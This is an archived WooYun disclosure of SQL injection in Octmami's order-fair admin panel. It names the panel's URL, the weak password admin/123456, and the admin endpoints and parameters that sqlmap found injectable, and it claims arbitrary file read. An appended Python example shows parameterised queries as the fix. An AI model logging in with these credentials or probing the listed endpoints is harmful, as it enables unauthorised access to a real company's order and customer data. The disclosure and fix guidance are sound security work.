WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online reader -------- http://drop.zone.ci/
2015-10-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-12-07: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
There are not many orders yet, but if they grow later the volume of user information will be considerable, and a leak would be bad, so better take precautions now!~~~
WooYun: Octmami (十月妈咪) official store, injection through to intranet probing (multiple vulnerabilities bundled). From that expert's submission I learned that http://fair.st.octmami.com/admin.php has a weak password, admin/123456, which still has not been fixed. The login page has anti-injection protection, but once logged in almost every parameter can be an injection parameter. Listing them and testing a few at random is enough to prove the issue.
http://fair.st.octmami.com/admin.php?r=order/default/index&param[download]=0&param[purchase]=&param[type]=&param[season]=&param[cat_big]=&param[cat_middle]=&param[cat_small]=&param[wave]=&param[level]=&param[scheme]=&param[price_level_id]=&param[style_sn]=1&param[order]=p.style_sn&param[view]=&page=1
param[purchase], param[type], param[season], param[cat_big], param[cat_middle], param[cat_small], param[wave], param[level], param[scheme], param[price_level_id], param[style_sn]=1 and param[order] are all injectable.
sqlmap identified the following injection points with a total of 1483 HTTP(s) requests:
The remaining places are injectable in the same way.
1. http://fair.st.octmami.com/admin.php?r=order/order/index&param[purchase]=&param[type]=&param[department]=&param[area]=&param[leader]=&param[order]=o.cost_item&page=1&param[download]=0&param[leader_name]=&param[name]=
param[purchase], param[type], param[department], param[area], param[leader], param[order], page=1&param[download], param[leader_name], param[name]: these parameters are also injectable.
2. http://fair.st.octmami.com/admin.php?r=order/manage/manage&parm[name]=&parm[type]=&parm[purchase_id]=&parm[province]=&parm[area]=
parm[name], parm[type], parm[purchase_id], parm[province], parm[area]
3. http://fair.st.octmami.com/admin.php?r=order/product/manage&pro[lsh]=&pro[kh]=&pro[pm]=&pro[catb]=&pro[cats]=&pro[sh]=&pro[jgd]=
pro[lsh], pro[kh], pro[pm], pro[catb], pro[cats], pro[sh], pro[jgd]: these are likewise injectable.
4. http://fair.st.octmami.com/admin.php?r=order/order/detail&order_id=2015091554519899
order_id is injectable.
5. http://fair.st.octmami.com/admin.php?r=order/default/dialogue&style_sn=161117010494
style_sn is injectable.
6. http://fair.st.octmami.com/admin.php?r=order/manage/update&id=100001509
id is injectable.
Arbitrary file read is possible.
It's late, so I'll stop here; tomorrow I'll look at whether the other parts of the site have injection as well~~~~
As above.
Fix the weak password; fix the parameters.
Unable to contact the vendor, or the vendor actively declined.
Vulnerability Rank: 15 (WooYun rating)
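As an added illustration of the "fix the parameters" recommendation (example code written for this page, not code from the report or from the vendor's site), the following Python/sqlite3 snippet rebuilds the filter logic behind the param[] query string listed above in two forms: the concatenation pattern sqlmap flagged, and a hardened version that binds every param[] value and whitelists param[order], which is a column identifier and therefore cannot be bound. The table layout and rows are constructed; only the parameter names come from the report.

```python
import sqlite3

# Constructed stand-in for the admin module's product table; only the param[]
# keys come from the report, the table layout and rows are made up here.
SCHEMA = """
CREATE TABLE meet_product (
    id INTEGER PRIMARY KEY, style_sn TEXT, type TEXT, season TEXT, price_level_id TEXT);
INSERT INTO meet_product VALUES (1, '1', 'coat',  '2015AW', '3');
INSERT INTO meet_product VALUES (2, '2', 'dress', '2015SS', '1');
"""

# param[<name>] keys the order/default/index page accepts as filters (taken from
# the report's URL); any other key is ignored instead of reaching the query.
FILTER_COLUMNS = {"purchase", "type", "season", "cat_big", "cat_middle", "cat_small",
                  "wave", "level", "scheme", "price_level_id", "style_sn"}
# param[order] is an identifier, so it cannot be a bound placeholder: whitelist it.
ORDER_WHITELIST = {"p.style_sn", "p.id"}

def build_vulnerable(params):
    """The pattern sqlmap flagged: values concatenated into WHERE and
    param[order] pasted into ORDER BY without escaping."""
    where = [f"p.{k} = '{v}'" for k, v in params.items()
             if k in FILTER_COLUMNS and v != ""]
    sql = "SELECT p.id FROM meet_product p"
    if where:
        sql += " WHERE " + " AND ".join(where)
    sql += " ORDER BY " + params.get("order", "p.id")
    return sql, ()

def build_hardened(params):
    """Same filter semantics: each value becomes a bound placeholder and the
    sort column must match the whitelist exactly or the request is refused."""
    where, args = [], []
    for k, v in params.items():
        if k in FILTER_COLUMNS and v != "":
            where.append(f"p.{k} = ?")   # k is whitelisted, v is bound
            args.append(v)
    order = params.get("order", "p.id")
    if order not in ORDER_WHITELIST:
        raise ValueError("param[order] is not an allowed sort column")
    sql = "SELECT p.id FROM meet_product p"
    if where:
        sql += " WHERE " + " AND ".join(where)
    return sql + " ORDER BY " + order, tuple(args)

def run(builder, params):
    """Execute the built query against a fresh in-memory copy of the sample table."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    sql, args = builder(params)
    return [row[0] for row in db.execute(sql, args)]

def hardened_rejects(params):
    """True when the hardened builder refuses the request outright."""
    try:
        build_hardened(params)
    except ValueError:
        return True
    return False
```

With a tautology in param[type], `run(build_vulnerable, ...)` returns every row while `run(build_hardened, ...)` returns none, and a non-whitelisted param[order] is rejected before any SQL is built.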